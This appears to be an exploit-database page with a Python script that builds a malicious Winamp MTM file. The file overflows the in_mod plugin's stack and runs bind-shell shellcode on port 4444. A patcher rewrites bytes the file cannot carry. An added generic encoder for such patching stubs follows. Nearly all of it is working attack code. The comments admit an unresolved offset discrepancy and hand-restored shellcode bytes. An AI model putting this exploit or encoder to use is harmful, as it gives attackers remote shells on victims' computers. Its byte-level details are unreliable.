0day.today - Biggest Exploit Database in the World.
Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit
#!/usr/bin/env python3
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
#   fdisk: Who wrote the skeleton of what you are looking at
#   Ryujin: For pointing the bug
#   Muts: For bringing the pain and the omelet ideas that weren't used
#   dijital1 and All the EDB-Team
#   The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
#
# Layout of the generated file: MTM header, a NOP sled that fills the
# overflowed stack buffer, the saved return address overwritten with a
# JMP ESP, then patch_shellcode, then the bind shellcode. After the JMP ESP
# the CPU is executing patch_shellcode, which recovers its own address with
# PUSH ESP / POP EBX, moves EBX to the bind shellcode and rewrites in memory
# every byte the file could not carry (the author's "badchars"): the file
# holds a harmless placeholder, and SUB BYTE PTR [EBX], imm8 turns it back
# into the real byte before the shellcode runs.

# MTM header from fdisk's PoC: "MTM" magic, version 0x10, 20-byte song name
# ("SpaceTrack(kosmosis)"), then the remaining header fields as in the PoC.
header  = b"\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += b"\x04\x0C" * 16

nopsled = b"\x90" * 58207          # fills the buffer up to the saved return address
eip = b"\xED\x1E\x95\x7C"          # 0x7C951EED: jmp esp, WIN XP SPANISH, change at will

# Run-time patcher. SUB EBX, 0xFFFFFC95 moves EBX forward by 0x36B (875)
# bytes from the address PUSH ESP captured, which must be where the bind
# shellcode starts; the INC EBX / SUB BYTE PTR [EBX], imm8 pairs then walk it
# placeholder by placeholder. Note that patch_shellcode as listed is 847
# bytes, not 875; the author reports every offset below as verified on the
# target, so confirm the distance in a debugger before changing any sled.
patch_shellcode  = b"\x90" * 16
patch_shellcode += b"\x90\x33\xDB"            # Set EBX to zero
patch_shellcode += b"\x54\x5B"                # PUSH ESP ; POP EBX  GET THE RELATIVE POSITION
patch_shellcode += b"\x81\xEB\x95\xFC\xFF\xFF"  # make EBX point to our shell
patch_shellcode += b"\x43" * 13               # Move EBX as close as we can to the first badchar
patch_shellcode += b"\x90" * 4                # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 1                # Move EBX to the first badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 13 - verified
patch_shellcode += b"\x43" * 3                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 05 - verified
patch_shellcode += b"\x43" * 16               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\xEC"            # Set it to 21 - verified
patch_shellcode += b"\x43" * 1                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x7C"            # Set it to 8e - verified
patch_shellcode += b"\x90" * 8                # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 30               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 05 - verified
patch_shellcode += b"\x90" * 8                # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 11               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x42"            # Set it to CB - verified
patch_shellcode += b"\x43" * 1                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x78"            # Set it to 92 - verified
patch_shellcode += b"\x90" * 26               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 18               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 04 - verified
patch_shellcode += b"\x90" * 16               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 15               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 02 - verified
patch_shellcode += b"\x43" * 8                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x21"            # Set it to EC - verified
patch_shellcode += b"\x43" * 1                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x7C"            # Set it to 8e - verified
patch_shellcode += b"\x90" * 14               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 18               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x49"            # Set it to c1 - verified
patch_shellcode += b"\x90" * 13               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 4                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to EA, but we need F6
patch_shellcode += b"\x80\x2B\xF4"            # Set it to F6 - verified
patch_shellcode += b"\x43" * 9                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 11 - verified
patch_shellcode += b"\x43" * 10               # Move EBX to the next badchar
patch_shellcode += b"\x90" * 3                # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x80\x2B\xCD"            # Set it to 3D - verified
patch_shellcode += b"\x43" * 3                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 07 - verified
patch_shellcode += b"\x43" * 11               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 12 - verified
patch_shellcode += b"\x43" * 4                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 12 - verified
patch_shellcode += b"\x90" * 13               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 4                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 12 - verified
patch_shellcode += b"\x43" * 8                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 12 - verified
patch_shellcode += b"\x90" * 19               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 11               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x8E"            # Set it to 7F - verified
patch_shellcode += b"\x43" * 1                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\xDF"            # Set it to 2B - verified
patch_shellcode += b"\x43" * 8                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x1E"            # Set it to EC - verified
patch_shellcode += b"\x90" * 11               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 12               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 8 - verified
patch_shellcode += b"\x90" * 28               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 29               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\xa7"            # Set it to 66 - verified
patch_shellcode += b"\x43" * 1                # Move EBX to the next badchar
patch_shellcode += b"\x90" * 4                # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x80\x2B\xb8"            # Set it to 52 - verified
patch_shellcode += b"\x90" * 9                # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 17               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 3 - verified
patch_shellcode += b"\x90" * 9                # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 3                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 12 - verified
patch_shellcode += b"\x90" * 12               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 2                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 3 - verified
patch_shellcode += b"\x43" * 7                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 2 - verified
patch_shellcode += b"\x90" * 10               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 6                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 13 - verified
patch_shellcode += b"\x43" * 3                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 5 - verified
patch_shellcode += b"\x43" * 3                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x1B"            # Set it to F2 - verified
patch_shellcode += b"\x43" * 1                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\xF4"            # Set it to 16 - verified
patch_shellcode += b"\x90" * 19               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 4                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 10 - verified
patch_shellcode += b"\x43" * 4                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 10 - verified
patch_shellcode += b"\x90" * 20               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 17               # Move EBX to the next badchar
patch_shellcode += b"\x90" * 28               # Lazy nopsled
patch_shellcode += b"\x43" * 16               # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x26"            # Set it to E7 - verified
patch_shellcode += b"\x90" * 18               # Nop sled to avoid damage from CrLf
patch_shellcode += b"\x43" * 1                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\xBE"            # Set it to 4C - verified
patch_shellcode += b"\x43" * 7                # Move EBX to the next badchar
patch_shellcode += b"\x80\x2B\x20"            # Set it to 5 - verified
patch_shellcode += b"\x90" * 66               # padding before the shellcode

# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
# "\x33  # Should be 13" means the file carries 0x33 and the patcher above
# subtracts 0x20 at run time. The bytes marked "Ripped" were replaced in the
# file by a \x0d\x0a pair; those pairs were missing from the copy published
# on this page and are restored below from the patcher's own arithmetic
# (placeholder minus imm8 equals the ripped byte, e.g. 0x0d - 0xec == 0x21
# and 0x0a - 0x7c == 0x8e, for every site), which also brings the buffer
# back to the 344 bytes stated above.
shellcode  = b"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += b"\x33"                                      # Should be 13
shellcode += b"\xa9\x41"
shellcode += b"\x25"                                      # Should be 05
shellcode += b"\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0"
shellcode += b"\x56\x0d\x0a"                              # \x21\x8e Ripped (\x0d\x0a restored)
shellcode += b"\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4"
shellcode += b"\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6"
shellcode += b"\x25"                                      # Should be 05
shellcode += b"\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee\x0d\x0a"  # \xcb\x92 Ripped (\x0d\x0a restored)
shellcode += b"\x15\x21\x17"
shellcode += b"\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d"
shellcode += b"\x24"                                      # Should be 04
shellcode += b"\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22"
shellcode += b"\x22"                                      # Should be 02
shellcode += b"\x35\xb4\xe9\x4d\x8e\x4f\xb5\x0d\x0a"      # \xec\x8e Ripped (\x0d\x0a restored)
shellcode += b"\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f"
shellcode += b"\x56\x97\x63\x6c\xcf\x29\x36\x0d\x0a"      # \xc1 Ripped (\x0a restored)
shellcode += b"\x36\x76\x0d\x0a"                          # \xf6 Ripped (\x0a restored)
shellcode += b"\x15\xfa\xef"
shellcode += b"\xc1\x8a\xe8\xc3\x92"
shellcode += b"\x31"                                      # Should be 11
shellcode += b"\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d\x0a"  # \x3d Ripped (\x0a restored)
shellcode += b"\xfc\x2b"
shellcode += b"\x27"                                      # Should be 07
shellcode += b"\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f"
shellcode += b"\x32"                                      # Should be 12
shellcode += b"\x56\x6c\xfa"
shellcode += b"\x32"                                      # Should be 12
shellcode += b"\x46\x6c\xea"
shellcode += b"\x32"                                      # Should be 12
shellcode += b"\xfa\xef\xcf\x29\x14\x63\xcf"
shellcode += b"\x32"                                      # Should be 12
shellcode += b"\x8c\xde"
shellcode += b"\x3c\x29\xa1\x25\xd9\x86\x52\xC0\x0d\x0a"  # \x7f\x2b Ripped (\x0d\x0a restored)
shellcode += b"\x15\x6e\xfc\xbe\xd5\x57"
shellcode += b"\x0d\x0a"                                  # \xec Ripped (\x0a restored)
shellcode += b"\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c"
shellcode += b"\x28"                                      # Should be 08
shellcode += b"\x83\x76"
shellcode += b"\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68"
shellcode += b"\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29\x0d\x0a"  # \x66\x52 Ripped (\x0d\x0a restored)
shellcode += b"\x20\xa4\x6f\x6f"
shellcode += b"\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc"
shellcode += b"\x23"                                      # Should be 03
shellcode += b"\xbf\x47"
shellcode += b"\x32"                                      # Should be 12
shellcode += b"\x57"
shellcode += b"\x23"                                      # Should be 03
shellcode += b"\x29\xac\x24\x3b\x3d\x94"
shellcode += b"\x22"                                      # Should be 02
shellcode += b"\xea\x6d\x4d\x57\xf2"
shellcode += b"\x33"                                      # Should be 13
shellcode += b"\xc0\xdc"
shellcode += b"\x25"                                      # Should be 05
shellcode += b"\xfa\xe9\x0d\x0a"                          # \xf2\x16 Ripped (\x0d\x0a restored)
shellcode += b"\x57\x6e\xf8"
shellcode += b"\x30"                                      # Should be 10
shellcode += b"\x6f\x3e\xf8"
shellcode += b"\x30"                                      # Should be 10
shellcode += b"\x50\x6e"
shellcode += b"\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef"
shellcode += b"\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5"
shellcode += b"\x57\xd7\x99\x0d\x0a"                      # \xe7\x4c Ripped (\x0d\x0a restored)
shellcode += b"\xfa\xbe\xd3\xc0\x79\x41"
shellcode += b"\x25"                                      # Should be 05
shellcode += b"\x3f"

payload = header + nopsled + eip + patch_shellcode + shellcode

try:
    # Binary mode: a text-mode write on Windows would expand the \x0a
    # placeholders to \x0d\x0a and shift every offset the patcher relies on.
    with open("crash.mtm", "wb") as f:
        f.write(payload)
    print("MTM file generated successfully (%d bytes)" % len(payload))
except OSError as exc:
    print("Cannot create file: %s" % exc)

# 0day.today [2024-12-24] #
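The patcher above was built by hand: the author counted INC EBX steps to each placeholder and chose every SUB immediate so that placeholder minus immediate lands on the byte the file could not carry. The following is an added example, not code from the original post or its author, that automates that construction for any shellcode and any badchar set and checks the result offline with a small interpreter of the instruction forms the stub uses. It assumes the same layout as the exploit: the stub is the first thing executed after a JMP ESP, so PUSH ESP / POP EBX yields the stub's own address; like the exploit it encodes the forward distance as a negative imm32 so the high bytes stay 0xff. The badchar set, the sample shellcode (every byte value once) and all function names are constructed for the example; the stub's own opcodes (0x54 0x5b 0x81 0xeb 0x80 0x2b 0x43 0x90) and 0xff must not be bad bytes, which encode() checks and reports.

```python
"""Run-time badchar patching, generalised from the in_mod exploit above.

Constructed example, not code from the original post. Given raw shellcode and
the set of bytes the target file will not carry intact, emit
  (a) placeholder shellcode with every bad byte replaced by a clean one, and
  (b) an x86 stub that, executed at the address ESP points to after JMP ESP
      (assumed, as in the exploit's layout), rewrites each placeholder back
      to the original byte with SUB BYTE PTR [EBX], imm8.
"""
import struct

PUSH_ESP_POP_EBX = b"\x54\x5b"  # push esp ; pop ebx -> EBX = ESP at entry (stub start)
SUB_EBX_IMM32 = b"\x81\xeb"     # sub ebx, imm32; a negative imm keeps the high bytes 0xff
ADD_EBX_IMM8 = b"\x83\xc3"      # add ebx, imm8 (sign-extended, so only 1..0x7f is used)
INC_EBX = b"\x43"               # inc ebx
SUB_BYTE_PTR_EBX = b"\x80\x2b"  # sub byte ptr [ebx], imm8
NOP = b"\x90"


def pick_fix(orig, bad):
    """Return (placeholder, imm8), both clean, with (placeholder - imm8) & 0xff == orig."""
    for imm in range(1, 256):
        if imm in bad:
            continue
        placeholder = (orig + imm) & 0xff
        if placeholder not in bad:
            return placeholder, imm
    raise ValueError("no single-step fix for byte %#04x" % orig)


def move_ebx(distance, bad):
    """Emit code that advances EBX by `distance` bytes using only clean bytes."""
    out = b""
    can_add = not ({ADD_EBX_IMM8[0], ADD_EBX_IMM8[1]} & bad)
    while distance > 0:
        step = min(distance, 0x7f)
        while step > 3 and step in bad:      # the imm8 itself must be clean
            step -= 1
        if can_add and step > 3:
            out += ADD_EBX_IMM8 + bytes([step])
            distance -= step
        else:
            out += INC_EBX
            distance -= 1
    return out


def encode(shellcode, bad):
    """Return (stub, placeholder_shellcode); neither part contains a bad byte."""
    bad = set(bad)
    placeholder = bytearray(shellcode)
    body = b""
    pos = 0
    for off, orig in enumerate(shellcode):
        if orig not in bad:
            continue
        placeholder[off], imm = pick_fix(orig, bad)
        body += move_ebx(off - pos, bad) + SUB_BYTE_PTR_EBX + bytes([imm])
        pos = off
    # EBX must land on placeholder[0], i.e. stub start + len(stub). The length
    # goes into the stub as a negative imm32; pad with NOPs until it is clean.
    for pad in range(256):
        stub_len = len(PUSH_ESP_POP_EBX) + len(SUB_EBX_IMM32) + 4 + pad + len(body)
        imm32 = struct.pack("<I", (-stub_len) & 0xffffffff)
        if not (set(imm32) & bad):
            break
    else:
        raise ValueError("cannot encode the stub length without bad bytes")
    stub = PUSH_ESP_POP_EBX + SUB_EBX_IMM32 + imm32 + NOP * pad + body
    leaked = set(stub) & bad
    if leaked:
        raise ValueError("stub needs bad bytes: %s" % [hex(b) for b in sorted(leaked)])
    return stub, bytes(placeholder)


def run_stub(stub, placeholder):
    """Interpret the stub over stub+placeholder. Offsets stand in for addresses
    and offset 0 is where ESP points at entry (the assumed layout). Returns the
    bytes left where the placeholder shellcode was."""
    mem = bytearray(stub + placeholder)
    esp_at_entry, ebx, eip = 0, 0, 0
    while eip < len(stub):
        pair = bytes(mem[eip:eip + 2])
        if pair == PUSH_ESP_POP_EBX:
            ebx, eip = esp_at_entry, eip + 2
        elif pair == SUB_EBX_IMM32:
            ebx = (ebx - struct.unpack("<I", mem[eip + 2:eip + 6])[0]) & 0xffffffff
            eip += 6
        elif pair == ADD_EBX_IMM8:
            ebx, eip = (ebx + mem[eip + 2]) & 0xffffffff, eip + 3
        elif pair == SUB_BYTE_PTR_EBX:
            mem[ebx] = (mem[ebx] - mem[eip + 2]) & 0xff
            eip += 3
        elif mem[eip] == INC_EBX[0]:
            ebx, eip = (ebx + 1) & 0xffffffff, eip + 1
        elif mem[eip] == NOP[0]:
            eip += 1
        else:
            raise ValueError("unexpected opcode %#04x at offset %d" % (mem[eip], eip))
    return bytes(mem[len(stub):])


# Constructed sample: every byte value once, so every bad byte is exercised.
SAMPLE_SHELLCODE = bytes(range(256))
BADCHARS = set(range(0x20))     # control bytes, the class the exploit above patches

if __name__ == "__main__":
    stub, ph = encode(SAMPLE_SHELLCODE, BADCHARS)
    print("stub %d bytes, placeholder %d bytes, round-trip ok: %s"
          % (len(stub), len(ph), run_stub(stub, ph) == SAMPLE_SHELLCODE))
```

The simulator only knows the six encodings the generator emits, which is enough to prove the stub restores the original bytes and that no bad byte appears anywhere in stub plus placeholder. What it cannot prove is the exploit's remaining assumption, that the loader puts the stub at ESP unchanged and the shellcode exactly len(stub) bytes after it; that distance is the constant the exploit carries in SUB EBX, 0xFFFFFC95, and the only way to confirm it on a real target is a debugger.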